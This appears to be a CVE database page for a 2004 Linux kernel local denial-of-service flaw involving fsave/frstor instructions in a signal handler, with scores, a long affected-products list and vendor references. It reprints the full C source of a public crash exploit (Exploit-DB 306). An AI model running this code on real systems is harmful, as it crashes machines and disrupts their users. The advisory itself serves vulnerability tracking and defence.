Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Linux kernel 2.4.x and 2.6.x for x86 allows local users to cause a denial of service (system crash), possibly via an infinite loop that triggers a signal handler with a certain sequence of fsave and frstor instructions, as originally demonstrated using a "crash.c" program.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | AV:L/AC:L/Au:N/C:N/I:N/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 306
Publication date : 2004-06-24
22h00 +00:00
Author : lorenzo
EDB Verified : Yes
/* -----------------------------------------------------------------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* -----------------------------------------------------------------------------
*/
/*
-----------------------------------------
Some debugging information made
available by stian_@_nixia.no
-----------------------------------------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// <<EOF
// milw0rm.com [2004-06-25]
Products Mentioned
Configuraton 0
Avaya>>Converged_communications_server >> Version 2.0
- Avaya>>Converged_communications_server >> Version 2.0 (Open CPE detail)
Avaya>>Modular_messaging_message_storage_server >> Version s3400
Gentoo>>Linux >> Version 1.4
- Gentoo>>Linux >> Version 1.4 (Open CPE detail)
- Gentoo>>Linux >> Version 1.4 (Open CPE detail)
- Gentoo>>Linux >> Version 1.4 (Open CPE detail)
- Gentoo>>Linux >> Version 1.4 (Open CPE detail)
- Gentoo>>Linux >> Version 1.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.18
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.18 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.19
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.19 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.21
- Linux>>Linux_kernel >> Version 2.4.21 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.21 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.21 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.21 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.21 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.22
- Linux>>Linux_kernel >> Version 2.4.22 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.22 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.22 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.23
- Linux>>Linux_kernel >> Version 2.4.23 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.23 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.4.23 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.24
- Linux>>Linux_kernel >> Version 2.4.24 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.25
- Linux>>Linux_kernel >> Version 2.4.25 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.4.26
- Linux>>Linux_kernel >> Version 2.4.26 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.0
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.0 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.1
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.1
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.1
- Linux>>Linux_kernel >> Version 2.6.1 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.2
- Linux>>Linux_kernel >> Version 2.6.2 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.2 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.2 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.2 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.2 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.3
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.3 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.4
- Linux>>Linux_kernel >> Version 2.6.4 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.4 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.4 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.4 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.4 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.5
- Linux>>Linux_kernel >> Version 2.6.5 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.5 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.5 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.5 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.5 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.6
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.6
- Linux>>Linux_kernel >> Version 2.6.6 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.7
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.7
- Linux>>Linux_kernel >> Version 2.6.7 (Open CPE detail)
Redhat>>Enterprise_linux >> Version 2.1
Redhat>>Enterprise_linux >> Version 2.1
Redhat>>Enterprise_linux >> Version 2.1
Redhat>>Enterprise_linux >> Version 3.0
Redhat>>Enterprise_linux >> Version 3.0
- Redhat>>Enterprise_linux >> Version 3.0 (Open CPE detail)
Redhat>>Enterprise_linux >> Version 3.0
Suse>>Suse_linux >> Version 7
Suse>>Suse_linux >> Version 8
Suse>>Suse_linux >> Version 8.0
- Suse>>Suse_linux >> Version 8.0 (Open CPE detail)
- Suse>>Suse_linux >> Version 8.0 (Open CPE detail)
Suse>>Suse_linux >> Version 8.0
Suse>>Suse_linux >> Version 8.1
- Suse>>Suse_linux >> Version 8.1 (Open CPE detail)
Suse>>Suse_linux >> Version 8.2
- Suse>>Suse_linux >> Version 8.2 (Open CPE detail)
Suse>>Suse_linux >> Version 9.0
- Suse>>Suse_linux >> Version 9.0 (Open CPE detail)
- Suse>>Suse_linux >> Version 9.0 (Open CPE detail)
Suse>>Suse_linux >> Version 9.0
Suse>>Suse_linux >> Version 9.1
- Suse>>Suse_linux >> Version 9.1 (Open CPE detail)
Configuraton 0
Avaya>>Intuity_audix >> Version *
Suse>>Suse_email_server >> Version 3.1
Suse>>Suse_email_server >> Version iii
Suse>>Suse_linux_admin-cd_for_firewall >> Version *
- Suse>>Suse_linux_admin-cd_for_firewall >> Version - (Open CPE detail)
Suse>>Suse_linux_connectivity_server >> Version *
- Suse>>Suse_linux_connectivity_server >> Version - (Open CPE detail)
Suse>>Suse_linux_database_server >> Version *
- Suse>>Suse_linux_database_server >> Version - (Open CPE detail)
Suse>>Suse_linux_firewall_cd >> Version *
- Suse>>Suse_linux_firewall_cd >> Version - (Open CPE detail)
Suse>>Suse_linux_office_server >> Version *
- Suse>>Suse_linux_office_server >> Version - (Open CPE detail)
Suse>>Suse_office_server >> Version *
- Suse>>Suse_office_server >> Version - (Open CPE detail)
Avaya>>S8300 >> Version r2.0.0
- Avaya>>S8300 >> Version r2.0.0 (Open CPE detail)
Avaya>>S8300 >> Version r2.0.1
- Avaya>>S8300 >> Version r2.0.1 (Open CPE detail)
Avaya>>S8500 >> Version r2.0.0
- Avaya>>S8500 >> Version r2.0.0 (Open CPE detail)
Avaya>>S8500 >> Version r2.0.1
- Avaya>>S8500 >> Version r2.0.1 (Open CPE detail)
Avaya>>S8700 >> Version r2.0.0
- Avaya>>S8700 >> Version r2.0.0 (Open CPE detail)
Avaya>>S8700 >> Version r2.0.1
- Avaya>>S8700 >> Version r2.0.1 (Open CPE detail)
Conectiva>>Linux >> Version 8.0
- Conectiva>>Linux >> Version 8.0 (Open CPE detail)
Conectiva>>Linux >> Version 9.0
- Conectiva>>Linux >> Version 9.0 (Open CPE detail)
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9426
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.novell.com/linux/security/advisories/2004_17_kernel.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000845
Tags : vendor-advisory, x_refsource_CONECTIVA
Tags : vendor-advisory, x_refsource_CONECTIVA
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2915
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.mandriva.com/security/advisories?name=MDKSA-2004:062
Tags : vendor-advisory, x_refsource_MANDRAKE
Tags : vendor-advisory, x_refsource_MANDRAKE
2025©
tesweb SA
